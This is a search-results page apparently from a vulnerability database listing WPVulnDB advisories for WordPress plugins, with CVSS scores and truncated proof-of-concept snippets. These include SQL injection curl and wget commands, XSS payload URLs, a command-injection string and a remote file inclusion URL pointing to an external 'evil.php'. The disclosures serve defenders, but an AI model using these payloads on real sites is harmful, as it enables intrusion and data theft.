Lucene search
K
WpvulndbMost viewed

14603 matches found

WPVulnDB
WPVulnDB
added 2022/05/24 12:0 a.m.24 views

Rating by BestWebSoft < 1.6 - Rating Denial of Service

The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service on the post/page when a user submit such rating PoC Under Settings - Discussion, uncheck "Comment must be manually approved" Install and Enable Rating BestWebSoft plugin Change...

6.5CVSS1.9AI score0.01204EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/05/23 12:0 a.m.24 views

Like Button Rating < 2.6.45 - Arbitrary e-mail Sending

The plugin allows any logged-in user, such as subscriber, to send arbitrary e-mails to any recipient, with any subject and body PoC As a subscriber, run the below command in the web developer console of the browser fetch"/wp-admin/admin-ajax.php?action=likebtntestvotenotification", "headers":...

6.5CVSS3.5AI score0.0077EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/05/16 12:0 a.m.24 views

Discy < 5.2 - Settings Update via CSRF

The theme lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary plugin's settings including payment methods via a CSRF attack PoC...

4.3CVSS3.8AI score0.01244EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/05/10 12:0 a.m.24 views

Easy FAQ with Expanding Text <= 3.2.8.3.1 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its settings, allowing high privilege users to perform Cross-Site Scripting attacks when unfilteredhtml is disallowed PoC Put the following payload in any of the plugin's settings such as Font size, Font Color and save: "...

4.8CVSS2.1AI score0.00565EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/05/09 12:0 a.m.24 views

Form Maker By 10Web < 1.14.12 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitize and escape the Custom Text settings, which could allow high privilege user such as admin to perform Cross-Site Scripting attacks even when unfilteredhtml is disallowed PoC In a form settings, put the following payload in the Actions after submission Action Type Custom...

4.8CVSS1.1AI score0.00995EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/04/19 12:0 a.m.24 views

Advanced Image Sitemap <= 1.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the PHPSELF PHP variable before outputting it back in an attribute in an admin page, leading to Reflected Cross-Site Scripting. PoC https://example.com/wp-admin/options-general.php/%22%3E%3Csvg/onload=alert/xss/%3E?page=ais...

6.1CVSS0.3AI score0.00773EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/04/14 12:0 a.m.24 views

Modern Events Calendar Lite < 6.5.2 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some parameters, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks when unfilteredhtml is disallowed...

4.8CVSS3.3AI score0.00543EPSS
Exploits0Affected Software1
WPVulnDB
WPVulnDB
added 2022/04/13 12:0 a.m.24 views

SEMA API < 4.02 - Unauthenticated SQLi

The plugin does not properly sanitise and escape some parameters before using them in SQL statements via an AJAX action, leading to SQL Injections exploitable by unauthenticated users PoC v 3.64: curl http://example.com/wp-admin/admin-ajax.php --data 'action=getsemadata=attributes=-3 UNION ALL...

9.8CVSS1.5AI score0.01779EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/04/12 12:0 a.m.24 views

Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi

The plugin does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection PoC curl 'http://example.com/?restroute=/olistener/new' --data '"id":" SELECT SLEEP3"' -H 'content-type: application/json'...

9.8CVSS2.7AI score0.09999EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2022/04/11 12:0 a.m.24 views

Import and export users and customers < 1.19.2.1 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escaped imported CSV data, which could allow high privilege users to import malicious javascript code and lead to Stored Cross-Site Scripting issues PoC As admin, import the below CSV file via Tools Import and export users and customers /wp-admin/tools.php?page=ac...

4.8CVSS2.4AI score0.00689EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/04/05 12:0 a.m.24 views

WP-Appbox < 4.4.0 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when unfilteredhtml is disallowed...

4.8CVSS2.9AI score0.00576EPSS
Exploits0Affected Software1
WPVulnDB
WPVulnDB
added 2022/04/05 12:0 a.m.24 views

Tipsacarrier <= 1.4.4.2 - Unauthenticated Orders Disclosure

The plugin does not have any authorisation check in place some functions, which could allow unauthenticated users to access Orders data which could be used to retrieve the client full address, name and phone via tracking URL Vendor was notified on November 26th, 2021, did not reply nor fix the...

7.5CVSS0.2AI score0.0147EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/04/05 12:0 a.m.24 views

Pricing Table <= 1.5.2 - Author+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some parameters, which could allow users with a role as low as author to perform Cross-Site Scripting attacks...

4.8CVSS3.3AI score0.00576EPSS
Exploits0Affected Software1
WPVulnDB
WPVulnDB
added 2022/03/21 12:0 a.m.24 views

One Click Demo Import < 3.1.0 - Admin+ Arbitrary File Upload

The plugin does not validate the imported file, allowing high privilege users such as admin to upload arbitrary files such as PHP even when FILEMODS and FILEEDIT are disallowed PoC Access Tools Import One Click Demo Import Run Importer and import dummy XML file can be empty Intercept the request...

7.2CVSS6.9AI score0.01653EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2022/03/08 12:0 a.m.24 views

WP Block and Stop Bad Bots < 6.88 - Unauthenticated SQLi

The plugin does not properly sanitise and escape the User Agent before using it in a SQL statement to record logs, leading to an SQL Injection issue PoC GET / HTTP/1.1 User-Agent: '+SLEEP5-- g Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8...

9.8CVSS0.7AI score0.01583EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/03/07 12:0 a.m.24 views

Popup Builder < 4.1.1 - SQL Injection to Reflected Cross-Site Scripting

The plugin does not sanitise and escape the sgpb-subscription-popup-id parameter before using it in a SQL statement in the All Subscribers admin dashboard, leading to a SQL injection, which could also be used to perform Reflected Cross-Site Scripting attack against a logged in admin opening a...

9.8CVSS0.1AI score0.4408EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2022/03/07 12:0 a.m.24 views

Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure

The plugin does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the "refresh-backup" action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to...

4.3CVSS0.1AI score0.00487EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/02/28 12:0 a.m.24 views

3D FlipBook < 1.12.1 - Subscriber+ Stored Cross-Site Scripting

The plugin does not have authorisation and CSRF checks when updating its settings, and does not have any sanitisation/escaping, allowing any authenticated users, such as subscriber to put Cross-Site Scripting payloads in all pages with a 3d flipbook. PoC As a subscriber:...

5.4CVSS1.5AI score0.00591EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/02/16 12:0 a.m.24 views

WP Content Copy Protection & No Right Click < 3.4.5 - Settings Update via CSRF

The plugin does not have CSRF check when updating its settings, allowing attackers to make logged in admin update them via a CSRF attack...

8.8CVSS4.1AI score0.00415EPSS
Exploits0Affected Software1
WPVulnDB
WPVulnDB
added 2022/02/14 12:0 a.m.24 views

YOP Poll < 6.3.5 - Author+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of the settings available to users with a role as low as author before outputting them, leading to a Stored Cross-Site Scripting issue PoC As author, put the following payload in the Settings Integration Use Google reCaptcha Yes Site Key: v v 6.3.5 - "...

5.4CVSS2AI score0.00595EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/02/11 12:0 a.m.24 views

Email Subscribers & Newsletters < 5.3.2 - Unauthenticated arbitrary option update

The plugin lacks both authentication and nonce checks in its esdismissadminnotice function, allowing an external attacker to set arbitrary plugin options to "yes". PoC https://example.com/?optionname=userrolesdismissadminnotice=1 This will set the option igesuserroles to "yes"...

2.5AI score
Exploits0Affected Software1
WPVulnDB
WPVulnDB
added 2022/02/10 12:0 a.m.24 views

WP Statistics < 13.1.5 - Unauthenticated Blind SQL Injection

The plugin is vulnerable to unauthenticated SQL Injection via the exclusionreason parameter due to missing parameterization and escaping in the SQL query found on line 88 of the /includes/class-wp-statistics-exclusion.php file when the Record Exclusions feature is enabled. PoC Step 1: Insert "aaa...

9.8CVSS0.5AI score0.5346EPSS
Exploits3References1Affected Software1
WPVulnDB
WPVulnDB
added 2022/02/07 12:0 a.m.24 views

Multisite User Sync/Unsync < 2.1.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the wmussourceblog and wmusrecordperpage parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues PoC...

6.1CVSS0.7AI score0.00788EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/02/02 12:0 a.m.24 views

NotificationX < 2.3.9 - Unauthenticated Blind SQL Injection

The plugin does not sanitise and escape the nxid parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection PoC time wget 'https://example.com/?restroute=/notificationx/v1/analytics' --post-data="nxid=sleep2 -- x" -q -O-...

9.8CVSS2AI score0.34359EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/01/26 12:0 a.m.24 views

WordPress GDPR & CCPA < 1.9.26 - Authenticated Reflected Cross-Site Scripting

The checkprivacysettings AJAX action of the plugin, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript...

9.6CVSS0.02085EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/01/24 12:0 a.m.24 views

Popup Builder < 4.0.7 - LFI to RCE

The plugin does not validate and sanitise the sgpbtype parameter before using it in a require statement, leading to a Local File Inclusion issue. Furthermore, since the beginning of the string can be controlled, the issue can lead to RCE vulnerability via wrappers such as PHAR PoC Create a zip...

8.8CVSS1.3AI score0.05365EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2022/01/20 12:0 a.m.24 views

WordPress Download Manager < 3.2.34 - Authenticated SQL Injection to Reflected XSS

The plugin does not sanitise and escape the packageids parameter before using it in a SQL statement, leading to a SQL injection, which can also be exploited to cause a Reflected Cross-Site Scripting issue PoC...

8.8CVSS0.5AI score0.01464EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2022/01/18 12:0 a.m.24 views

ProfileGrid < 4.7.5 - Subscriber+ Stored Cross-Site Scripting

The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient escaping via the pmuseravatar and pmcoverimage parameters found in the /admin/class-profile-magic-admin.php file which allows attackers with authenticated user access, such as subscribers, to inject arbitrary web scripts...

6.4CVSS4.8AI score0.009EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2022/01/10 12:0 a.m.24 views

Ivory Search < 5.4.1 - Multiple Admin+ Stored Cross-Site Scripting

The plugin does not escape some of the Form settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC Go to the AJAX settings of a Form and put the following payload in the "Minimum number of characters...

4.8CVSS1.9AI score0.00598EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2022/01/06 12:0 a.m.24 views

IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF

The plugin does not have CSRF check in the ip2locationcountryblockersaverules AJAX action, allowing attackers to make a logged in admin block arbitrary country, or block all of them at once, preventing users from accessing the frontend. PoC Make an admin open a page with the following code in it,...

7.1CVSS3.5AI score0.00451EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/12/27 12:0 a.m.24 views

WP Post Page Clone < 1.2 - Unauthorised Post Access

The plugin allows users with a role as low as Contributor to clone and view other users' draft and password-protected posts which they cannot view normally. PoC Go to All Posts, find the post to clone, click "Click to Clone" then edit the cloned post to see its content...

4.3CVSS3.2AI score0.00783EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2021/12/27 12:0 a.m.24 views

Orders Tracking for WooCommerce < 1.1.10 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the fileurl before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting PoC https://example.com/wp-admin/admin.php?page=woo-orders-tracking-import-csvurl=%3Cimg+src+onerror%3Dalert%281%29%3Ewoterror=2...

6.1CVSS0.9AI score0.00887EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/12/13 12:0 a.m.24 views

The Plus Addons for Elementor Pro < 5.0.7 - Sensitive Data Disclosure

The plugin does not validate the qvquery parameter of the tpgetdlpostinfoajax AJAX action, which could allow unauthenticated users to retrieve sensitive information, such as private and draft posts PoC The following request allow an unauthenticated user to get the draft posts the nonce can be...

7.5CVSS1.8AI score0.01815EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/12/05 12:0 a.m.24 views

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. PoC http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

8.8CVSS1.3AI score0.0353EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/12/02 12:0 a.m.24 views

Post Duplicator < 2.27 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its Duplicate Title and Slug settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed PoC Put the following payload in the "Duplicate Title" or "Duplicate...

5.4CVSS1.9AI score0.00627EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2021/11/22 12:0 a.m.24 views

WP Guppy < 1.3 - Sensitive Information Disclosure

The plugin does not have any authorisation in some of the REST API endpoints, allowing any user to call them and could lead to sensitive information disclosure, such as usernames and chats between users, as well as be able to send messages as an arbitrary user PoC !/bin/bash Exploit Title:...

6.5CVSS6.2AI score0.02753EPSS
Exploits2References2Affected Software1
WPVulnDB
WPVulnDB
added 2021/11/17 12:0 a.m.24 views

Preview E-mails for WooCommerce < 2.0.0 - Reflected Cross-Site Scripting

The plugin is vulnerable to reflected XSS via the searchorder parameter found in the /views/form.php file. PoC...

6.1CVSS5.7AI score0.01131EPSS
Exploits3References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/11/16 12:0 a.m.24 views

Directorist – Business Directory Plugin < 7.0.6.2 - CSRF to Remote File Upload

The plugin was vulnerable to Cross-Site Request Forgery to Remote File Upload leading to arbitrary PHP shell uploads in the wp-content/plugins directory. This vulnerability was seen actively exploited by Sucuri in the wild for ransomware attacks. PoC 1. Authenticate as any user. 2. Paste below...

7.5CVSS7.5AI score0.00811EPSS
Exploits2References2Affected Software1
WPVulnDB
WPVulnDB
added 2021/11/15 12:0 a.m.24 views

Auto Featured Image < 3.9.3 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the postid parameter before outputting back in an admin page within a JS block, leading to a Reflected Cross-Site Scripting issue. PoC https://example.com/wp-admin/upload.php?page=menu-media-aptid=alert/XSS/...

6.1CVSS5.7AI score0.008EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2021/11/12 12:0 a.m.24 views

Contact Form 7 Database Addon < 1.2.6.1 - Arbitrary Form Deletion via CSRF

The plugin does not have CSRF check when processing bulk actions, which could allow attackers to make logged in admin delete arbitrary forms for example...

8.8CVSS5.1AI score0.00543EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/10/20 12:0 a.m.24 views

Sassy Social Share 3.3.23 - Missing Access Controls to PHP Object Injection

Version 3.3.23 of the Sassy Social Share WordPress plugin is vulnerable to PHP Object Injection via the wpajaxheateorsssimportconfig AJAX action due to a missing capability check in the importconfig function found in the /admin/class-sassy-social-share-admin.php file along with the implementation...

8.8CVSS1.4AI score0.01976EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/10/20 12:0 a.m.24 views

Download Monitor < 4.4.5 - Admin+ SQL Injection

The plugin does not properly validate and escape the "orderby" GET parameter before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue PoC There need to be at least one log for the payload to trigger...

7.2CVSS0.6AI score0.17484EPSS
Exploits5Affected Software1
WPVulnDB
WPVulnDB
added 2021/10/14 12:0 a.m.24 views

MyBB Cross-Poster <= 1.0 - Admin+ Stored Cross-Site Scripting

The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the /classes/MyBBXPSettings.php file which allowed attackers with administrative user access to inject arbitrary web scripts. This affects multi-site...

5.5CVSS4.8AI score0.00916EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/09/27 12:0 a.m.24 views

NinjaForms < 3.5.8.2 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape the custom class name of the form field created, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC With the Form Builder "Dev Mode” setting enabled, create a form and a...

4.8CVSS4.7AI score0.00598EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2021/09/21 12:0 a.m.24 views

jQuery Reply to Comment <= 1.31 - CSRF to Stored Cross-Site Scripting

The plugin does not have any CSRF check when saving its settings, nor sanitise or escape its 'Quote String' and 'Reply String' settings before outputting them in Comments, leading to a Stored Cross-Site Scripting issue. PoC Put the following payload in the 'Quote String' or 'Reply String' setting...

6.1CVSS2AI score0.00399EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2021/09/20 12:0 a.m.24 views

LearnPress < 4.1.3.1 - Multiple Admin+ Stored Cross-Site Scripting

The plugin does not properly sanitize or escape various inputs within course settings, which could allow high privilege users to perform Cross-Site Scripting attacks when the unfiltredhtml capability is disallowed PoC When adding new courses, the following fields can have XSS payloads like "...

4.8CVSS1.9AI score0.00661EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2021/09/15 12:0 a.m.24 views

PDF Light Viewer < 1.4.12 - Authenticated Command Injection

The plugin allows users with Author roles to execute arbitrary OS command on the server via OS Command Injection when invoking Ghostscript. PoC 1 Go to Import PDF. 2 Select PDF file. 3 Set compression as 60 | calc | echo 4 Toggle import the first checkbox 5 Publish or update 6 Command executes...

9CVSS4.3AI score0.04268EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2021/09/13 12:0 a.m.24 views

Simple Social Media Share Buttons < 3.2.4 - Authenticated Stored Cross-Site Scripting

The plugin does not escape the Share Title settings before outputting it in the frontend pages or posts depending on the settings used, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC Put the following payload in the...

4.8CVSS0.2AI score0.00598EPSS
Exploits2Affected Software1
WPVulnDB
WPVulnDB
added 2021/09/09 12:0 a.m.24 views

Feedify Web Push Notifications <= 2.1.8 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting via the eedifymsg parameter found in the /includes/base.php which allows attackers to inject arbitrary web scripts...

4.3CVSS4.7AI score0.00895EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/09/09 12:0 a.m.24 views

MoolaMojo <= 0.7.4.1 - Reflected Cross-Site Scripting

The plugin is vulnerable to Reflected Cross-Site Scripting via the classes parameter found in the /views/button-generator.html.php file which allows attackers to inject arbitrary web scripts...

6.1CVSS4.9AI score0.00782EPSS
Exploits0References1Affected Software1
Total number of security vulnerabilities5000